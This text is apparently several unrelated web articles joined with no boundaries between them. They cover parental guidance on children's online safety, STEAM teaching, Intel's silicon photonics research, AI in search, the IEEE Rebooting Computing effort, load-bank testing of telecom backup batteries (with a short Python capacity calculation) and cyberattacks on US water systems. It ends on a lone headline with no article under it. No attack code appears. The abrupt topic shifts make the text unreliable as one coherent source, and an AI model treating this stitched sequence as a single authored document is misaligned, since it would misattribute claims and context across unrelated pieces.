Teaching kids to recognize and navigate potential dangers, such as interacting with strangers online, is akin to arming them with a protective shield. It is crucial to empower children with the understanding of how to differentiate between ordinary interactions and potential threats, such as online predators or online bullies. By having discussions about the importance of protecting information and the possible outcomes of sharing it with strangers, parents and educators can give children the knowledge they need to make informed choices and remain cautious while navigating the digital realm. Furthermore, instilling a sense of digital literacy and responsible online behavior from an early age shapes the way children engage with technology, and this will be reflected in the future. Teaching kids to be critical thinkers and encouraging them to question the authenticity of online information cultivates a healthy skepticism that can help them avoid falling victim to scams or misinformation. Keeping your children safe online also means showing them strategies for handling online bullying or harassment, empowering them to seek help and report such incidents, and fostering a supportive, safe online environment for kids. Ultimately, informing our kids about online risks isn't about instilling fear but rather about nurturing their ability to make safe and informed choices, thereby ensuring their digital experiences are enriching and secure.

Open and consistent communication with children regarding their online activities

Maintaining open and consistent communication with children about their online activities is a cornerstone of nurturing a safe and responsible digital presence. Engaging in conversations that openly cover both the benefits and the potential risks of the online world allows parents to guide and support their kids effectively. Establishing family rules and guidelines that teach kids the importance of safeguarding personal details and adhering to responsible online behavior can lay a strong foundation for their online interactions. By involving children in discussions about setting boundaries and respecting privacy, parents can teach them to make thoughtful decisions while navigating the digital realm. One crucial aspect of this communication is addressing potential exposure to inappropriate content. Parents can initiate age-appropriate discussions about the types of content children may come across online and teach them how to handle such situations. Creating an atmosphere where kids feel at ease sharing their encounters and worries promotes trust and empowers parents to provide guidance in dealing with inappropriate content.
By nurturing these communication channels, parents can stay connected to their children's experiences, offer timely advice, and help ensure that their online activities are both educational and secure.

To Protect Your Child Online, Set Up Parental Controls and Privacy Settings

Keeping your child safe online involves establishing parental controls and privacy settings. By adjusting the security settings on devices and platforms, parents gain a degree of influence over the content and interactions their children come across. Initiating an open conversation with children about these measures is equally vital. Talking openly about the reasons behind parental controls and the family rules in place helps children understand the importance of online safety and the boundaries established to protect them. Teaching kids about personal details and the significance of keeping sensitive information private further enhances their awareness of potential online risks. In addition to parental controls, security software can provide an added layer of protection. Installing reputable security software can help filter out harmful content, monitor online activities, and prevent unauthorized access. A few tips for parents: stay informed about the latest security features offered by devices and platforms, regularly review and adjust privacy settings, and stay engaged in ongoing conversations with your children about their online experiences. By combining parental controls, privacy settings, and open communication, parents can create a digital space where their children can explore and learn while enjoying a safe and secure online journey.

What are the benefits of parental control software?

Parental control software offers a variety of advantages for modern families striving to create a secure and nurturing online environment. In an ever-expanding digital landscape, these tools provide an invaluable means to establish and maintain security settings tailored to each child's age and maturity. Many parents find solace in knowing that such software acts as a virtual guardian, enabling them to set ground rules and enforce limitations on the types of content their children can access. This not only helps shield young minds from inappropriate or harmful material, but also cultivates responsible online behavior from an early age. Another significant benefit lies in the opportunity for parents to actively engage in open discussions about internet safety. Parental control software serves as a catalyst for dialogue about the importance of adhering to established rules and understanding the rationale behind these measures. By involving children in the decision-making process and explaining the purpose of the security settings, parents foster a sense of responsibility and accountability. Moreover, these tools offer peace of mind, enabling parents to strike a balance between allowing their children to explore the digital realm and ensuring their safety. As children learn to navigate the online landscape with the guidance of parental control software, they develop essential skills for staying safe online and gain the confidence to seek help from a trusted adult whenever they encounter unfamiliar or uncomfortable situations. In this way, parental control software not only keeps children safe online, but also empowers them to become responsible digital citizens.
How to install and configure parental controls on different devices

Installing and configuring parental controls on different devices is a proactive step towards keeping your child safe online and ensuring their digital experiences align with your family's values. Each platform offers specific ways to establish and customize these safeguards. For smartphones and tablets, parents can explore the device's settings to locate the parental controls section. Here, they can often set restrictions on app downloads, limit online access during specific hours, and filter out inappropriate content. By enabling these controls, parents can strike a balance between granting their children the benefits of mobile technology and shielding them from potential risks. For computers, both Windows and macOS come equipped with built-in parental control features that allow parents to manage web browsing, set time limits for online activities, and monitor usage patterns. On popular web browsers, extensions and add-ons can be installed to further enhance parental controls, providing options to block specific websites or filter search results. Additionally, gaming consoles offer parental control settings that limit gameplay time, restrict access to certain games based on age ratings, and prevent interactions with strangers during online gaming sessions. By delving into the settings of each device, parents can tailor the level of control to their children's needs and developmental stages, ensuring a safer and more enriching digital experience.

Social media platforms' privacy settings and how to adjust them

Social media privacy settings play a pivotal role in protecting children as their online presence grows and in keeping their digital experiences secure. As kids are drawn to social networking sites and interact with others through their mobile devices, it becomes crucial for parents to be well-versed in adjusting these settings to create a protective digital environment. Explaining the age limits associated with different platforms is a crucial starting point, because many sites and games contain material that is not appropriate for younger users. Many social media platforms have minimum age requirements to sign up, which are designed to protect younger users from potential risks and inappropriate content. Parents can engage in meaningful conversations with their children about these age restrictions and the reasons behind them, promoting an understanding of responsible online behavior. To adjust privacy settings for a child's personal information on social media platforms, parents can guide their children through the process step by step. Begin by accessing the account settings, where options to control who can view posts, send friend requests, or access personal information are often available. Teach children to set these options to "friends only" or "private" to restrict access to their posts and details. Additionally, instruct them to carefully review and manage their friend list, ensuring they only connect with people they know and trust in real life. On mobile devices, installing social media apps with built-in privacy controls can offer an added layer of security.
Regularly reviewing and updating these settings, along with encouraging open communication about online experiences, empowers children to navigate social media platforms safely and responsibly, contributing to a positive and secure digital presence.

Teach Online Safety Practices

Teaching online safety practices is an essential responsibility in today's digital realm, especially as kids interact with various platforms, including social networking sites. Parents and educators play a crucial role in imparting knowledge about safe online interactions. Clarifying the reasons behind safety rules and restrictions helps children understand the importance of adhering to them and fosters responsible online behavior from an early age. Engaging children in discussions about the safety features provided by different platforms is equally vital. Educate them about using privacy settings to control who can access their information and posts. Emphasize the importance of reporting any instances of online bullying or inappropriate content, fostering a culture of empowerment and accountability. Encourage open conversations about their online experiences, ensuring children feel comfortable sharing concerns and seeking guidance whenever needed. By imparting these online safety practices, parents equip children with the tools to navigate the digital world confidently while fostering a respectful and secure online environment.

Educating children about strong and unique passwords

Informing your children about the importance of strong and unique passwords is an indispensable part of their digital literacy journey. As children engage in online activities such as browsing, online purchases, and social interactions, understanding password security becomes paramount. One fundamental principle to emphasize is avoiding default passwords. Default passwords, often set by manufacturers or platforms, can be easily exploited by cybercriminals seeking unauthorized access to personal accounts; teaching children to replace them with their own is a critical step towards better security. Furthermore, the habit of creating strong and unique passwords helps shield children's personal information, from personal details to school projects, from potential breaches. Encourage them to craft passwords that combine uppercase and lowercase letters, numbers, and symbols while avoiding easily guessable information, such as birth dates or names. Stressing the importance of using different passwords for different online accounts is equally vital: if one account is ever compromised, it won't give cybercriminals access to the others. By giving children this knowledge, parents empower them to use the internet securely and responsibly, protecting their online activity and personal information from potential dangers.

Understanding and avoiding phishing attempts

Understanding and avoiding phishing attempts is a crucial skill in today's interconnected digital realm, where our kids engage in diverse online activities across various devices. One common method cybercriminals employ is the use of deceptive pop-ups. These seemingly innocuous windows may prompt users to enter personal information, often in the guise of urgent messages or enticing offers.
Teaching our kids, especially children who are active on devices like mobile phones, to exercise caution and never provide personal information in response to pop-ups is paramount. Encouraging skepticism and the habit of verifying the legitimacy of such requests can thwart potential phishing attacks and safeguard sensitive information. Children, who may be particularly vulnerable to online predators, benefit greatly from understanding the concept of phishing and recognizing the tactics used by malicious actors. By fostering an understanding of phishing attempts and nurturing a discerning approach to online interactions, kids can enjoy a safer experience across their various online activities and devices.

Recognizing and reporting suspicious behavior or content

Recognizing and promptly reporting suspicious behavior or content is a critical aspect of keeping children safe online as they engage in activities across different devices. As kids immerse themselves in the digital realm, particularly in online games, educating them about the importance of vigilance is essential. One particular concern is the presence of predators on the internet, who may take advantage of games and other platforms to target children. It is crucial to teach kids how to recognize signs of suspicious behavior, such as someone asking for personal information or trying to arrange an in-person meeting. By doing this, we give our children the tools they need to identify threats and respond appropriately. Children should understand that they need to report any such incidents to a trusted adult, whether a parent, teacher, or another authority figure. This approach encourages a sense of responsibility and accountability, ensuring that children actively participate in their own safety. By nurturing this awareness and cultivating a culture of reporting, parents and educators contribute to a safer digital environment where children can explore, learn, and communicate while avoiding risks such as identity theft or interactions with toxic individuals.

Limit Screen Time and Establish Technology-Free Zones

Limiting screen time and creating designated technology-free zones at home are essential strategies for promoting a healthy and balanced lifestyle, especially in a world where mobile phones and other devices are ubiquitous. Many parents now understand the significance of setting boundaries on the amount of time kids spend in front of screens; children need a range of activities beyond digital interactions. By establishing rules about when and how long devices can be used, parents can encourage their children to explore their interests, engage in physical activities, and interact with the world around them. Additionally, involving kids in conversations about screen time limits helps them develop a sense of responsibility and self-control, empowering them to make their own decisions about technology. Creating technology-free zones within the home further supports a harmonious balance between digital engagement and offline experiences. These designated spaces, such as the dining room or bedrooms, provide opportunities for genuine human interaction and quality family time without the distractions of screens.
As many parents have discovered, having specific areas where devices are not allowed cultivates an environment where meaningful conversations and bonding can flourish. This approach reinforces the idea that there is a time and place for technology while also nurturing interpersonal skills and promoting mental well-being. By incorporating these practices, families can manage screen time effectively, encourage holistic growth, and forge deeper connections among family members in today's digital age.

Creating tech-free zones within the home, such as during meals or before bedtime

In the midst of our fast-paced digital lives, creating tech-free zones within the home has emerged as a valuable practice for fostering meaningful human interaction and promoting overall well-being. Designating specific times, such as during meals or before bedtime, as moments free from mobile devices and screens offers a sanctuary where family members can connect, engage in genuine conversations, and savor the present moment. By setting boundaries around mealtimes, families can relish shared meals without the distraction of checking notifications or the urge to post online. This simple yet impactful practice promotes togetherness and mindfulness, allowing everyone to unwind and engage in unhurried, face-to-face conversations. The hours leading up to bedtime provide another opportune moment to establish a tech-free zone. Encouraging the habit of putting away mobile phones and avoiding screens before sleep can significantly improve sleep quality and promote a peaceful transition into rest. Research shows that the blue light emitted by screens can disrupt the body's natural sleep-wake cycle, making it harder to fall asleep. By designating a technology-free period before bedtime, kids can engage in calming activities such as reading, reflecting, or gentle stretching, all of which contribute to a more restorative night's sleep. Embracing tech-free zones during these crucial times not only nurtures deeper connections and quality rest but also reinforces the importance of balance in our increasingly connected lives.

Encourage Responsible Social Media Usage

Encouraging responsible social media usage is a fundamental aspect of nurturing your kids' digital well-being. As kids increasingly engage in online activities and manage their own accounts, guiding them towards a thoughtful approach to social media is essential. Emphasize the significance of maintaining a positive online reputation, reminding them that the content they share can have lasting effects on their digital identity. Teach them the value of being mindful about the information they post, the photos they share, and the interactions they engage in, as these collectively shape their online presence. By instilling responsible social media habits from an early age, parents can empower their children to navigate the digital landscape with awareness, integrity, and a sense of digital citizenship.

Discussing the potential consequences of oversharing personal information online

Engaging in conversations with your children about the consequences of sharing too much personal information online is a vital step in their digital education.
By discussing the risks of revealing details like their location, school, or other identifiable information, parents can help their kids grasp the importance of protecting their privacy. Emphasize that not everyone they encounter on the internet has good intentions, and talk about the danger of coming across an online predator who could exploit their personal data. Empower your children by teaching them to be cautious about what they share and who they interact with online, as this shapes responsible online behavior and helps them navigate the digital world confidently and securely.

Promoting good digital citizenship and respectful behavior on social media platforms

Promoting good digital citizenship and fostering respectful behavior on social media platforms is a cornerstone of guiding our children's online interactions. By explaining the significance of treating others with kindness and empathy, parents can help their kids navigate the complexities of virtual relationships. Encourage your children to think before they post, comment, or send a direct message, reminding them that their words can affect others in different ways. Discuss the potential consequences of inappropriate behavior, emphasizing the importance of maintaining a safe and respectful online environment with their friends. By instilling these values, parents empower their children to contribute positively to the digital community they are part of, ensuring that their online interactions mirror the same respect and consideration they would show face to face.

Monitor Online Activities

Monitoring your kids' online activities is a responsible approach to ensuring their safety and well-being, both in the digital realm and in their everyday connections with others. As a proactive step, parents can work with their internet service provider to implement parental controls that limit access to inappropriate content and establish boundaries for online access. Regularly reviewing their kids' online interactions, the websites they visit, and the apps they use allows parents to identify potential risks and initiate constructive conversations about responsible internet use. By maintaining an open and supportive dialogue and explaining the age limits of the sites they use, parents can strike a balance between protecting their children and fostering their autonomy, ultimately creating a secure and enriching online environment where kids can explore and learn while staying safe.

Balancing trust and supervision when it comes to online activities

Striking a delicate balance between trust and supervision is essential when guiding your child's online activities. While fostering a sense of autonomy is crucial, it's equally important to prioritize their internet safety while still respecting their interests and comfort. Open conversations about the risks of sharing personal information online help children understand the importance of safeguarding their identity. By setting clear guidelines and periodically checking their online interactions, parents can ensure a safe digital experience without stifling their child's exploration. This balance encourages responsible online behavior that mirrors real-life interactions, empowering kids to make informed choices while navigating the vast online realm.
Stay Updated on the Latest Online Threats

Staying updated on the latest online threats is fundamental to protecting your kids in the digital realm. As technology evolves, new challenges and threats can arise daily, making it essential for parents to stay informed about risks that could affect their children's internet safety. Regularly checking for news and updates on online security, particularly related to mobile phones, online accounts, and instant messaging programs, empowers parents to stay a step ahead of potential dangers and give their kids a safer online environment. By remaining vigilant and educated, parents can effectively guide their children in navigating the digital world safely while imparting valuable lessons about responsible online behavior and the importance of staying cautious in a rapidly changing online landscape.

Advocating for schools and community organizations to provide resources and workshops on online safety

It is crucial for schools and community organizations to prioritize resources and interactive workshops on safe web usage. With the growing integration of online learning and classroom platforms, schools need to actively educate students about risks and about effective practices for safeguarding their online accounts, so that every child is prepared to navigate the web. By partnering with community organizations, parents can help build an environment where children acquire skills such as identifying online threats and understanding the significance of privacy settings. These resources and workshops offer tools that empower individuals to make informed decisions while interacting online, fostering a culture of responsibility and ultimately contributing to a more secure online experience for everyone involved.

Cyberbullying Prevention and Intervention

It is important to be proactive in preventing cyberbullying and intervening effectively to keep your children safe in today's digital era. As kids engage with their friends, both offline and online, it is vital to promote a culture that values respect and empathy. Engage in discussions about the dangers of cyberbullying, emphasizing the significance of treating others with kindness, whether they met online or in person. Encourage your kids to be vigilant and to speak up if they witness or experience any form of online harassment. Equipping them with strategies to report and block harmful behavior can empower them to navigate the digital realm confidently. By instilling a strong sense of empathy and responsibility, parents play a pivotal role in creating a safe and supportive online environment where kids can explore, connect, and learn while treating others with dignity and compassion.

Steps to take if a child becomes a victim of cyberbullying

If a child falls victim to cyberbullying, it is crucial to take supportive action. Start by providing a non-judgmental space for them to express their experiences and emotions. Encourage them to gather evidence of the cyberbullying, such as screenshots or messages, as this can be vital when reporting the incident and seeking intervention. Reach out to the platform or website to report the behavior and ask for assistance in removing harmful content. In persistent cases of cyberbullying, involving school authorities or law enforcement may become necessary.
Let your child know that they are not alone, and assure them that you will tackle the situation together. Offer support while guiding them towards healthier online interactions, which can help restore their sense of security and confidence in their online experiences.

Promoting a positive and inclusive online environment

Creating a positive and inclusive environment for your children involves instilling values like empathy, respect, and responsible behavior in their interactions across digital platforms. Encourage them to view their devices and online accounts as tools for building connections and making a positive impact on online communities. Teach them the importance of treating others with kindness, both online and offline, and guide them on how to navigate conflicts or disagreements constructively. By emphasizing good online manners and helping them understand the consequences of their words and actions, parents can empower their kids to shape a space that mirrors the inclusive and compassionate values they follow in their everyday lives.

Today, nearly every child has a computer, mobile phone, or other smart device within reach, and digital technologies are constantly evolving. There is nothing wrong with a kid having a smartphone in their pocket or a computer at home, but teaching them about the potential risks is essential to protecting their mental health and well-being. As parents, we know what kinds of dangers can hide behind the screen, and it is our responsibility to teach our kids not only about the risks but also how to be kind and empathetic online. In doing so, we make them more comfortable browsing the internet, communicating, and playing games with friends. Every parent should explain that technology is valuable but demands attention because of the risks it can hide; with that understanding, a child can grow into a responsible adult.
2020 brought many challenges to learning, and now districts across the country are working to address what has been termed “learning loss”—or the term I prefer “unfinished learning.” Some of the funding that schools are using to help support these programs include ESSER funds from the CARES and ARP Acts. We are seeing a trend where more schools are adopting an adaptive curriculum and addressing student engagement with STEM programs. Some of this is due to the requirements behind the ARP ESSER funds, but most of it is because schools recognize the need to prepare students for their future, which includes globally competitive markets based on technology. Science, technology, engineering, art, and mathematics (STEAM) are grouped together to create powerful learning opportunities where students have the chance to uncover their interests and explore ideas that may not come out of traditional, single subject curriculum. Sometimes, STEAM is misunderstood to be its own separate subject, but connecting these subjects encourages educators to integrate other disciplines into lessons and allow students the opportunity to apply learning in new and creative ways. Consider a lesson on money. This lesson could easily have science, technology, and engineering incorporated by extending the lesson to include a hands-on practical learning experience. The extension could be asking students to build a structure with materials that have a cost associated with them. It could be constrained to certain dimensions and required to hold a specific amount of weight within a cost budget. At the end of the lesson, students could create a “shark tank” type of media presentation to convince investors to support their project. Not every lesson or STEAM engagement should be scripted. A true STEAM environment nurtures curiosity, critical thinking, collaboration, creativity, communication, and citizenship. STEAM environments allow for movement, conversation, respectful disagreements, and collaborative support of ideas. I’ve had a lot of engagements with senior executives at some of the world’s largest engineering firms and asked them what they are looking for in their future workforce. While they all want their employees to have technical skills, they were very clear that they are looking for employees that are creative, understand how to work with people, and can help to create a culture of innovation and collaboration amongst peers. STEAM learning isn’t a trend, and it isn’t going away. If you are looking for what types of STEAM learning tools to add to your lessons, start with adapting one lesson you already teach and extend it to include STEAM. When you are ready to move beyond that and incorporate other disciplines such as computer science, look for products that include a robust curriculum. Most importantly, know that it’s okay if you aren’t an expert on things like coding and robotics. Be honest with your students and allow your students to be the functional experts while you remain the facilitative expert.
Researchers with Intel have moved a step closer toward integrating silicon chips and lasers in a new field the company calls silicon photonics: the process of creating on-chip components that can use light to transmit data. On July 24, researchers with the Santa Clara, Calif., company announced that they had significantly increased the bandwidth with the help of a laser modulator that will now allow data to transmit at 40 gigabits per second. Previously, Intel had announced gear running at 10Gbps in its labs. The next step, said Mario Paniccia, an Intel fellow and director of the company's Photonics Technology Lab, will be to use 25 of these silicon laser modulators, each working at 40Gbps, to produce a 1 terabit-per-second, high-speed optical link. A terabit equals 1,000 billion bits. This latest development, Paniccia said, is an enormous step toward the company's goal of developing products built around silicon photonics technology, including practical uses inside enterprise data centers and also with telecommunications companies. The ability of the silicon laser modulators to reach 40Gbps means the technology can now match the speed of the fastest modulators available on the market. So far, Intel and its researchers have not offered specific guidelines or road maps for products to be built using silicon photonics, although the company has said it has plans to incorporate some of the technology into commercial products by the end of the decade. When Paniccia first began experimenting with silicon photonics, his labs were able to transmit data at only 1Gbps. The jump to 10Gbps and then to 40Gbps shows how far the company's research has come since those first days. "The fact that we're actually transmitting at 40 gigabits per second is an enormous leap forward in performance," Paniccia told eWEEK. "This development gives us an idea about what is happening now. We've looked at the building blocks and proved that we can do this." The laser modulator that Intel used to achieve 40Gbps is smaller and consumes less power than the previous ones used to achieve 10Gbps. The modulator is based on what Paniccia calls a traveling wave design that transmits the data. Intel's labs have been working for some time to develop silicon photonics as a replacement for traditional electrical interconnects, which use copper wiring to speed up the connections that move data to and from microprocessors. Silicon photonics, however, is expensive and requires what Intel calls exotic materials to make this technological experiment a reality. The goal of the research is to develop photonic devices using silicon as the base material and use high-volume manufacturing processes that already exist at the company's fabs to help reduce the cost of bringing the technology to the commercial market. Intel also has a keen interest in this technology to develop high-bandwidth interconnects that can move more data. This is especially important for the company's development of multicore chips and its other experiments with what Intel calls "tera-scale" computing. Earlier this year, the company detailed its efforts behind developing an 80-core chip, although this remains a proof-of-concept design. Eventually, researchers believe they will be able to develop an integrated silicon photonic chip that can be used to achieve the I/O needed to realize the full potential of the company's tera-scale computing efforts.
A more practical use for silicon photonic technology in the data center, Paniccia said, would be to connect servers to one another without the traditional constraints of cables currently used to link the backplanes of systems. Eventually, the technology could be used to achieve a connection between CPUs or between CPUs and memory, replacing traditional copper wiring. On its way to scaling the laser modulators up to 1Tbps, Paniccia said researchers first will look to sustain performance at 100Gbps and 200Gbps.
Artificial intelligence (AI) is rapidly changing the search industry and is expected to continue doing so in the coming year. With the advancements in natural language processing, machine learning, and deep learning, AI is making search engines more intelligent and efficient in understanding user queries and providing relevant results. Let’s discuss some of the ways AI will change search in the coming year. AI will enable search engines to provide personalized search results based on user preferences and behaviour. By analysing user search history, location, and interests, AI algorithms can deliver customized results tailored to the user’s needs. This means that two people searching for the same term may get different results depending on their individual preferences. Voice search has become increasingly popular with the rise of smart speakers and virtual assistants. With the help of AI, voice search will become even more accurate and reliable. AI algorithms will analyse voice commands, natural language and context to provide more accurate and relevant results. Voice search will also become more conversational, enabling users to ask follow-up questions and receive personalized responses. Visual search allows you to search for images using pictures rather than text. With the help of AI, visual search will become more sophisticated and accurate. AI algorithms will analyse the image and provide relevant results based on visual features such as colour, shape, and texture. Visual search will also be able to recognise objects and provide information about them. Natural language processing Natural language processing (NLP) is the ability of machines to understand human language. With the help of NLP, search engines will be able to understand the context and intent behind user queries, providing more accurate and relevant results. NLP will also enable search engines to understand conversational queries, allowing you to search for information in a more natural way. Semantic search is a search technique that analyses the meaning of words and phrases to provide more relevant results. With the help of AI, semantic search will become even more accurate and effective. AI algorithms will be able to understand the relationships between words and concepts, enabling them to provide results that are more closely related to user intent. Predictive search is the ability of search engines to predict what a user is searching for based on their search history and behaviour. With the help of AI, predictive search will become more accurate and reliable. Algorithms will be able to analyse user behaviour and provide relevant suggestions before the user even finishes typing their query. Conversational search is a search technique that allows users to ask questions in a conversational tone, as if they were talking to a person. With the help of AI, conversational search will become more natural and effective. AI algorithms will be able to understand the context and intent behind the user’s query, enabling them to provide more accurate and relevant results. Augmented search is a search technique that combines search results with other data sources such as social media, news, and events. With the help of AI, augmented search will become more effective in providing relevant and timely results. AI algorithms will be able to analyse multiple data sources and provide a comprehensive view of the topic being searched. AI and search As you can see, AI will continue to revolutionize the search industry in the coming year. 
Just as it is changing the way we create content and images, it will change the way we use the web and how search engines will use the information we provide for rankings. With advancements in NLP, machine learning, and deep learning, search engines will become more intelligent and efficient in understanding user queries and providing relevant results. These advancements will enable us to find information more quickly and easily, and search engines to deliver more accurate and relevant results. Personalised, voice, visual, semantic, predictive, conversational, and augmented search will all offer opportunities and challenges to marketers, businesses, web designers, SEOs and anyone who works with search. So, as usual, new technology offers both challenges and opportunities to those in the industry. If nothing else, the next couple of years are going to be very interesting!
If there is any organization on the planet that has had a closer view of the coming demise of Moore’s Law, it is the Institute of Electrical and Electronics Engineers (IEEE). Since its inception in the 1960s, the wide range of industry professionals have been able to trace a steady trajectory for semiconductors, but given the limitations ahead, it is time to look to a new path—or several forks, to be more accurate. This realization about the state of computing for the next decade and beyond has spurred action from a subgroup, led by Georgia Tech professor Tom Conte and superconducting electronics researcher, Elie Track called “Rebooting Computing,” which produces reports based on invite-only deep dives on a wide range of post-Moore’s Law technologies, many of which were cited here this week via Europe’s effort to pinpoint future post-exascale architectures. The Rebooting Computing effort is opening its doors next week for a wider-reaching, open forum in San Diego to bring together new ideas in novel architectures and modes of computing as well as on the applications and algorithm development fronts. According to co-chair of the Rebooting Computing effort, Elie Track, a former Yale physicist who has turned his superconducting circuits work toward high efficiency solar cells in his role at startup Nvizix, Moore’s Law is unquestionably dead. “There is no known technology that can keep packing more density and features into a given space and further, the real issue is power dissipation. We just cannot keep reducing things further; a fresh perspective is needed.” The problem with gaining that view, however, is that for now it means taking a broad, sweeping look across many emerging areas; from quantum and neuromorphic devices, approximate computing, and a wide range of other technologies. “It might seem frustrating that this is general, but there is no clear way forward yet. What we all agree on is that we need exponential growth in computing engines.” “This end of CMOS scaling, coupled with the explosion of big data and the need for more compute power for both civilian and military applications, requires the kind of exponential growth we have enjoyed for so many years. But that is the challenge; this is a crisis. This is an inflection point. Incremental improvements are not the solution, but the improvements we need might come from other areas in computing.” The IEEE Rebooting Computing initiative has three main pillars, as Track explains. These include targeting new technology approaches that emphasize energy efficiency, security, and the human-application interfaces that make this all possible. Under this is an “engine room” of the host of non-traditional architectures that break beyond existing silicon barriers. It is worth taking note of what topics generate the most heat in the IEEE Rebooting Computing initiative because this is where government will take at least some of its cues for future investment. We pressed Track to detail which of the many architectures and approaches being presented seem to have the most traction. 
While the augmentation of continued CMOS (pushing Moore's Law to the very end) is always a hot topic (this is especially the case in the Department of Energy, with its exascale-class supercomputers still dependent on traditional scaling), the most controversy and diversity of ideas is happening around neuromorphic computing. "There are many ideas here; a much higher density that stretches across both devices and architectures." Other topics with wider pools of research to draw from are approximate computing and, on the software side, bolstering the human-computer interface. Despite the lack of direction or emphasis on one "saving grace" technology among the many being explored, Track says the reboot work is valuable for government agencies as they decide where to invest. Among the many agencies downwind of the most recent presidential green light, the National Strategic Computing Initiative, is IARPA, which Track says is doing some of the most bleeding edge, practical work to push new silicon alternatives from concept to reality. Programs that explore novel approaches to computing at IARPA run between 3-5 years. Track was associated with the C3 superconducting electronics group, which we will cover in a future article. While IARPA is focused on exploring some entirely new modes of computing, other agencies are forced to stay on the current CMOS track for practical reasons, including the need to keep scientific progress humming along via the same software frameworks. This is the case for the Department of Energy (DoE), which will, at this point, continue to follow traditional system design choices into the exascale era based on large-scale, heterogeneous platforms for the most part, all of which push closer to the 20MW power ceiling proposed by exascale decision-makers in the government and DoE. The DoE also has mission-critical workloads it wants to bolster using novel architectures, and given the emphasis on systems that go beyond HPC (embedded, for instance), its research efforts are more wide-ranging. DARPA has also done pioneering work on novel approaches to computing, most notably with its efforts to support neuromorphic computing, which is on the radar for the IEEE Rebooting Computing program. The National Science Foundation (NSF) also funds various initiatives and efforts that serve the goals put forth in NSCI. Despite these various efforts, Track says it is critical for the NSCI program to start to center on new programs that focus on a few of the technologies that will be presented this week and in the group's reports. "Everyone is waiting on the next election to see what programs are defined and how the funding will work. There is a need for better defined programs but we are still watching this take shape." Rebooting computing as we know it is a strategic imperative for research and enterprise reasons, but it will be a long road ahead, especially for those who cannot invest in untested technologies in the next decade. However, as Track mentions, it is critical that the government and broader industry understand well in advance which new approaches offer the most scalable, power-efficient, and mass-producible results.
Andrew Keith, Director of Power Prove, explains the role batteries play in keeping telecom services online, and the importance of regularly testing them. The summer weather can be problematic for our power services. Soaring temperatures can affect heat-sensitive equipment, causing complications with overhead lines and power plants that are unable to cool themselves down. Other extremes like lightning storms can also pose a problem. Back in 2019, two power stations failed just seconds after a major lightning strike in London, leaving almost a million people across England and Wales without power. But with telecommunications being such an important sector, for both our convenience and our safety, it’s vital that power supply is maintained. So, how can we do this, when so much relies on the availability of mains power? An additional source of power Space and cost restrictions mean it’s not always possible for mobile base stations and street cabinets to have their own independent generator. Batteries are the most common back-up solution, which are charged up on the mains electricity and can be used in times of outages. The battery health, therefore, is critical. Taking mobile base stations as an example, each one could be responsible for supplying thousands of homes and residents with connectivity; any loss of service could have serious consequences in an emergency. It’s important to know the exact condition of each battery within the network to identify whether it’s still fit for use or if it needs replacing. But how do you determine battery health? While batteries degrade naturally over time, those that work in areas that frequently experience outages will likely degrade faster than those that don’t. This happens as a result of the partial discharging and recharging that happens with frequent outages, which affects battery condition when done repeatedly. And when it comes to testing, static measurements of battery performance don’t always give a complete picture of its health or capacity. Testing with load banks Load banks can provide the solution. A load bank is a piece of electrical test equipment, which can simulate electrical loads to test an electric power source. Often used to verify the performance of generators, they can also be used to verify battery health with a simple discharge test. By completely discharging the battery, the load bank can explicitly identify its health and condition. While load banks for generator testing are often heavy and cumbersome to transport, there are much more convenient solutions available for telecom battery testing. While the summer weather brings joy to many of us, it can be tough on our energy supply. But for industries where power is critical, and individual generators aren’t feasible, there are solutions available. Regularly testing backup power supplies helps guarantee that our essential services are there when we need them.
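To make the discharge test concrete, here is a rough worked example (the 100 Ah rating, 10 A test current, and 80% replacement threshold are illustrative assumptions, not figures from Power Prove): the capacity a battery actually delivers during a constant-current discharge, compared against its rated capacity, gives a simple state-of-health figure.

```python
def battery_state_of_health(rated_capacity_ah: float,
                            discharge_current_a: float,
                            measured_runtime_h: float,
                            replace_below: float = 0.80):
    """Estimate remaining capacity from a constant-current load bank discharge test."""
    delivered_ah = discharge_current_a * measured_runtime_h   # Ah actually delivered under load
    health = delivered_ah / rated_capacity_ah                 # fraction of rated capacity remaining
    return health, health < replace_below

# A healthy 100 Ah backup battery discharged at 10 A should run for roughly 10 hours.
# If the load bank test ends after only 7.2 hours, about 72% of rated capacity remains.
health, needs_replacement = battery_state_of_health(100.0, 10.0, 7.2)
print(f"State of health: {health:.0%}, replace: {needs_replacement}")   # 72%, replace: True
```

In practice, technicians also account for temperature and the end-of-discharge voltage, but the core of the test is this comparison between delivered and rated capacity.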
Cyber threat actors have remained bold in how, when, and what they target, and public utility systems are no exception. At least two threat actors have been linked to cyberattacks targeting US water systems, according to the US Environmental Protection Agency (EPA). Attacks on water systems can interrupt the water supply and put public health at risk, and the recent incidents highlight the vulnerability of critical infrastructure to cyberattacks. To protect public service sectors like energy, utilities, and oil and gas, it's important to implement robust security strategies and versatile cybersecurity measures that comply with evolving regulations.

EPA response to cyber breaches

The two recent and ongoing threats to US water systems come from Iranian IRGC actors, who have exploited default passwords in operational technology at critical US infrastructure facilities, including water systems, and from the Chinese state-sponsored Volt Typhoon group, whose activities suggest pre-positioning to disrupt operations amid tensions or conflicts. Because many water system operators lack the resources for robust cybersecurity, leaving them vulnerable to attack, the federal government relies in part on partnerships with state and local governments to build sector resilience. The US government also continues its own efforts to secure public services, which now include a newly established Water Sector Cybersecurity Task Force. This task force, developed by the EPA, will work to identify near-term actions and strategies to reduce the risk of cyberattacks on water systems nationwide. Furthermore, the task force will build upon existing collaborative products, like the 2024 Roadmap to a Secure and Resilient Water and Wastewater Sector, and on recommendations from the meeting of the EPA, Department of Health and Human Services, and Department of Homeland Security secretaries to be held on March 21.

Securing public services with cyber solutions

According to the EPA, collaborative effort will best produce the advances needed to protect the nation's critical water infrastructure from cyberattacks. Cybersecurity support and technical assistance are available from state programs as well as private sector associations like the American Water Works Association and National Rural Water Association. Technology solutions providers, such as global technology major HCLTech, also offer services and expertise that can help secure the digital frontier for the public sector. HCLTech offers a range of end-to-end security services for public services organizations that can protect them against threats while ensuring regulatory compliance and improving cybersecurity posture. The US Cybersecurity and Infrastructure Security Agency (CISA) says that there are more than 150,000 public water systems across the US that face threats from nation states, ransomware gangs, and hackers trying to steal customer information. Cybersecurity budgets are often limited for state and local governments, and many have not adopted important cybersecurity practices meant to thwart potential cyberattacks. Collaboration and training will play significant roles in developing cybersecurity best practices to secure water systems.
Impact of AI on Cybersecurity: Pros and Cons Analyzed by Experts

